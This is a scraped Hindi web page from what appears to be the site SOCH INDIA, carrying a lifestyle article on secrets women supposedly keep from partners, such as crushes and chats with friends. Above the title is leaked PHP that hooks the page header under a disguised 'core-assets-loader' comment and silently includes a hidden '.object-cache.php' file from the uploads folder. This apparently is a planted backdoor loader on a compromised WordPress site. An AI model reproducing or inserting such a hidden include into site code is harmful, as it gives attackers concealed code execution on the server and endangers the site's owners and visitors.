add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Girls Secrets: लड़कियां अपने पार्टनर से राज रखती हैं ये बातें, कभी नहीं करती शेय – SOCH INDIA
Menu

Girls Secrets: लड़कियां अपने पार्टनर से राज रखती हैं ये बातें, कभी नहीं करती शेय

nobanner

जब कोई कपल रिलेशनशिप में आता है, जो अक्सर वह पार्टनर से अपनी हर बात शेयर करते हैं। उन्हें अपनी जीवन की बातों में शामिल करते हैं और घर, परिवार, दोस्त हर किसी के बारे में बताते हैं। लड़कियां जानना चाहती हैं कि उनके पति या बॉयफ्रेंड की जिंदगी उनके संपर्क में आने से पहले कैसी थी और अब कैसी है। ऐसी ही उम्मीद लड़के भी अपनी प्रेमिका या पत्नी से रखते हैं। ऐसा होता भी है, दोनों एक दूसरे को लगभग सब कुछ बताते हैं लेकिन अगर आपको ऐसा लगता कि आपकी गर्लफ्रेंड या पत्नी आपको सब कुछ बताती है तो यहां आप गलत हैं। कोई भी लड़की पार्टनर को अपनी हर बात कभी नहीं बताती। कुछ बातें हैं जो वह हमेशा अपने पार्टनर से भी छुपाती हैं और उसे कभी शेयर नहीं करना चाहतीं। चलिए जानते हैं कि ऐसी कौन सी बातें हैं जो लड़कियां अपने पार्टनर से भी छुपाती हैं। 

क्रश के बारे में छुपाना

लड़की अपने पार्टनर के सामने अपने क्रश का जिक्र तो कर सकती हैं लेकिन उनके बारे में खुल कर बात नहीं करतीं। वह अपने क्रश की अधिक जानकारी अपने पार्टनर के साथ शेयर नहीं करतीं। कभी कभी तो वह क्रश का नाम तक नहीं बतातीं

सहेलियों संग निजी बातें

लड़कियां अक्सर अपनी महिला मित्रों के साथ समय बिताती हैं। जब उनकी मुलाकात होती है तो उनके बीच बहुत सारी गप शप भी होती है।  वह अपने पार्टनर को सहेली सेो हुई मुलाकात के बारे में तो बता सकती हैं लेकिन उनके बीच हुई गर्ल टाॅक्स को शेयर करने से बचती हैं।